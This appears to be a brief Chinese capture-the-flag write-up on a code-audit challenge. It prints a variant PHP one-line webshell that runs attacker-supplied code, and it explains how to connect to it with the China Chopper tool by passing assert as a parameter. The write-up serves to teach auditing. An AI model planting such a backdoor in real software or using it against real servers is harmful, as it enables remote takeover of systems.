1.此题属于代码审计,先下载源码,利用扫描工具直接扫描吧
使用seay源代码审计系统扫一扫(实在不想一个个去看。。。)
seay源代码审计系统:https://pan.baidu.com/s/1UhIqGc_wYfelqN47Tn_Qjg
2.检测出来可疑代码片段,打开文件检查一下,这种其实是变种一句话木马,菜刀连接的时候直接在后面加上?POST=assert,密码为GET,直接连接即可。
<?php
error_reporting(0);
$_GET['POST']($_POST['GET']);
?>3.上菜刀
